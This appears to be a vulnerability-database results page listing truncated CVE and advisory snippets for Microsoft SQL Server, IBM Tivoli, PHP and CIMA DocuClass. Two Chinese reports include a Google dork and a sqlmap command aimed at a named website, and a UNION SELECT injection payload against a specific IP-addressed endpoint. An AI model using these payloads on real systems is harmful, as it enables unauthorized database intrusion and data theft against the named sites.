CVE-2016-3059

CVE-2016-3059 affects IBM Tivoli Storage Manager for Databases (IBM Spectrum Protect for Databases) and IBM Tivoli Storage FlashCopy Manager for Microsoft SQL Server (IBM Spectrum Protect Snapshot). The vulnerability allows local users to disclose the cleartext SQL Server password by reading the ...

CVE-2016-3059

IBM Tivoli Storage Manager for Databases: Data Protection for Microsoft SQL Server aka IBM Spectrum Protect for Databases 6.3 before 6.3.1.7 and 6.4 before 6.4.1.9 and Tivoli Storage FlashCopy Manager for Microsoft SQL Server aka IBM Spectrum Protect Snapshot 3.1 before 3.1.1.7 and 3.2 before...

CIMA DocuClass ECM - Multiple Vulnerabilities

Exploit Title: CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities Date: July 15, 2016 Exploit Author: Karn Ganeshen ipositivesecurity.blogspot.com Vendor Homepage: cima-software.com Version: app version All Tested on: Microsoft Windows 2008 R2 DocuClass is a modular and...

Vulnerability of Microsoft SQL Server software, allowing a malicious entity to compromise the accessibility of protected information

There is a vulnerability in SQL Server that can cause a service failure. If exploited successfully, a malicious individual can trigger a server failure before it can be restarted manually...

Vulnerability of Microsoft SQL Server software, allowing a malicious entity to compromise protected information

Cross-site execution of scripts in SQL Master Data Services MDS allows a malicious actor to inject a script into a user’s Internet Explorer. With the help of this script, a malicious actor can replace the content on the website, gain access to confidential information, or perform any action on th...

CIMA DocuClass ECM - Multiple Vulnerabilities

Exploit for php platform in category web applications Exploit Title: CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities Date: July 15, 2016 Exploit Author: Karn Ganeshen ipositivesecurity.blogspot.com Vendor Homepage: cima-software.com Version: app version All Tested on:...

CIMA DocuClass ECM - Multiple Vulnerabilities

CIMA DocuClass ECM - Multiple Vulnerabilities Exploit Title: CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities Date: July 15, 2016 Exploit Author: Karn Ganeshen ipositivesecurity.blogspot.com Vendor Homepage: cima-software.com Version: app version All Tested on: Microsoft...

Microsoft SQL Server Login Possible

Binary data mssqllogin.nbin...

The vulnerability of the PHP interpreter, which allows a hacker to trigger a service failure

The vulnerability of the odbcBindcols function ext/odbc/phpodbc.c in the PHP interpreter arises due to incorrect handling of the SQLWVARCHAR column by the driver. Exploiting this vulnerability can allow an attacker, operating remotely, to cause a service failure application termination by using t...

PHP 'odbc_bindcols' Function Denial of Service Vulnerability

PHP PHP: Hypertext Preprocessor is an open source general-purpose computer scripting language maintained by the PHP Group and the open source community. The language supports multiple syntaxes, multiple databases and operating systems, and support for C, C++ for program extensions and so on. A...

CVE-2015-8879

The odbcbindcols function in ext/odbc/phpodbc.c in PHP before 5.6.12 mishandles driver behavior for SQLWVARCHAR columns, which allows remote attackers to cause a denial of service application crash in opportunistic circumstances by leveraging use of the odbcfetcharray function to access a certain...

CVE-2015-8879

The odbcbindcols function in ext/odbc/phpodbc.c in PHP before 5.6.12 mishandles driver behavior for SQLWVARCHAR columns, which allows remote attackers to cause a denial of service application crash in opportunistic circumstances by leveraging use of the odbcfetcharray function to access a certain...

How to Export SQL Logs

Purpose This article documents how to export logs from the two SQL database engines used by Veeam Backup & Replication: Microsoft SQL Server PostgreSQL Solution Microsoft SQL Server Log Collection The following steps require Microsoft SQL Server Management Studio SSMS. 1. Open Microsoft SQL Serve...

海天OA /loginverify.asp /LosePassAction.asp 两处post类型的sql注入

0x01 漏洞简介 提交时间： 2014-05-25 公开时间： 2014-08-21 漏洞类型： SQL注射漏洞 北京联杰海天科技有限公司是一家专业从事应用软件开发、集成服务的高科技企业，面向各类企事业单位开发、销售基于Internet/Intranet技术的系列软件产品，致力于政府机构及企业信息化和办公自动化建设。 目前，联杰公司凭借Microsoft系统平台上的开发经验，已经成功推出了基于Internet/Intranet平台的企业级网络应用系统。主打软件“海天OA”...

V5shop 在cart.aspx处的参数spikeid存在SQL注入漏洞

举例： 通过谷歌搜索inurl:productpic.aspx,因为cart.aspx是需要登录才可以正常访问，但是注入的时候毫无影响。 案例： http://www.wolifu.com/cart.aspx?act=spikebuy&spikeid=3 D:\sqlmappython sqlmap.py -u "http://www.wolifu.com/cart.aspx?act=spikebuy&spik eid=3" -p "spikeid" | | 1.0-dev-nongit-20150806 | -| . | | | .'| . | || |||||,| | || ||...

The vulnerability of the Microsoft SQL Server relational database management system allows attackers to enhance their privileges.

The vulnerability of the Microsoft SQL Server relational database management system is related to errors that occur during the operation of pointers. Exploiting this vulnerability can allow an attacker, operating remotely, to increase their privileges...

The vulnerability of the Microsoft SQL Server relational database management system allows a hacker to execute arbitrary code.

The vulnerability of the Microsoft SQL Server relational database management system is related to the absence of forced blocking of access to uninitialized memory areas. Exploiting this vulnerability allows a malicious actor to execute arbitrary code using a specially crafted query from a remote...

用友GRP系统sql注射

简要描述： 用友GRP系统sql注射 详细说明： 用友GRP系统sql注射 链接：http://221.2.68.102:8888/R9iPortal/cm/cminfocontent.jsp?infoid=42 注射参数： Payload: infoid=-7911 UNION ALL SELECT 78,78,78,78,78,78,78,78,78,78,78,78, CHAR113+CHAR98+CHAR113+CHAR118+CHAR113+CHAR74+CHAR98+CHAR75+CHAR...

Design/Logic Flaw

IBM Tivoli Storage Manager for Databases: Data Protection for Microsoft SQL Server aka Spectrum Protect for Databases 5.5 before 5.5.6.2, 6.3 before 6.3.1.6, 6.4 before 6.4.1.8, and 7.1 before 7.1.4; Tivoli Storage Manager for Mail: Data Protection for Microsoft Exchange Server aka Spectrum Prote...

CVE-2015-7404

CVE-2015-7404 affects IBM Tivoli Storage Manager products (Databases for SQL Server, Mail for Exchange, and FlashCopy Manager) when application tracing is enabled. The root issue is that the Change TSM Password operation (changetsmpassword) writes passwords in plaintext to application trace outpu...